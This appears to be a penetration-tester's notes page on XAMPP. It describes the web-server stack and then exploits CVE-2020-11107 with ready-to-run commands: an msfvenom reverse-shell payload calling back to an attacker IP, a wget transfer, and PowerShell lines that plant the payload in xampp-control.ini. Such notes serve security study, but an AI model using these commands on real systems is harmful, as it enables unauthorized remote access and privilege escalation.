XAMPP

XAMPP is a free, open-source, cross-platform web server solution stack package developed by Apache Friends. It is designed to provide an easy-to-install and ready-to-use environment for local web development and testing. The package bundles Apache HTTP Server, MariaDB database, and interpreters for PHP and Perl, along with additional tools such as phpMyAdmin for database management, FileZilla FTP Server, Mercury Mail Transport System, and optional components like Tomcat for Java applications.

Its architecture is intended for offline use, allowing developers to run fully functional web applications on a local machine without the need for a remote hosting environment. Installation is streamlined, requiring minimal configuration, and the entire stack can be started, stopped, or adjusted through a graphical control panel. XAMPP supports Windows, Linux, and macOS, offering a consistent environment across platforms.

Configuration files for Apache, PHP, and MariaDB are accessible and modifiable, enabling customization of the server environment to suit different development needs. Due to its open configuration by default—such as unrestricted database access and disabled authentication for certain utilities—it is intended strictly for local development and not for production deployment without hardening.

Local PE

XAMPP versions prior to 7.2.29, 7.3.x prior to 7.3.16, and 7.4.x prior to 7.4.4 on Windows are affected by a privilege escalation and arbitrary command execution vulnerability (CVE-2020-11107) due to insecure permissions on the xampp-control.ini configuration file. This file, which defines startup parameters for the XAMPP Control Panel executable (xampp-control.exe), is writable by unprivileged users.

By modifying specific entries within xampp-control.ini, an attacker with local, non-administrative access can alter executable paths or parameters to include malicious commands. When the XAMPP Control Panel is subsequently launched—either by an administrative user or during normal operation—these injected commands are executed with the privileges of the launching user. A working PoC is available.

# Generate a payload 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f exe -o shell.exe

# Transfer the payload to the target
> wget http://192.168.45.241:443/shell.exe -o shell.exe

# Define the target file
> $file = "C:\xampp\xampp-control.ini"

# Define the target line (second line: Editor=notepad.exe)
> $find = ((Get-Content $file)[2] -Split "=")[1]

# Define the payload
> $replace = "C:\users\mike\shell.exe"

# Inject the payload binary
> (Get-Content $file) -replace $find, $replace | Set-Content $file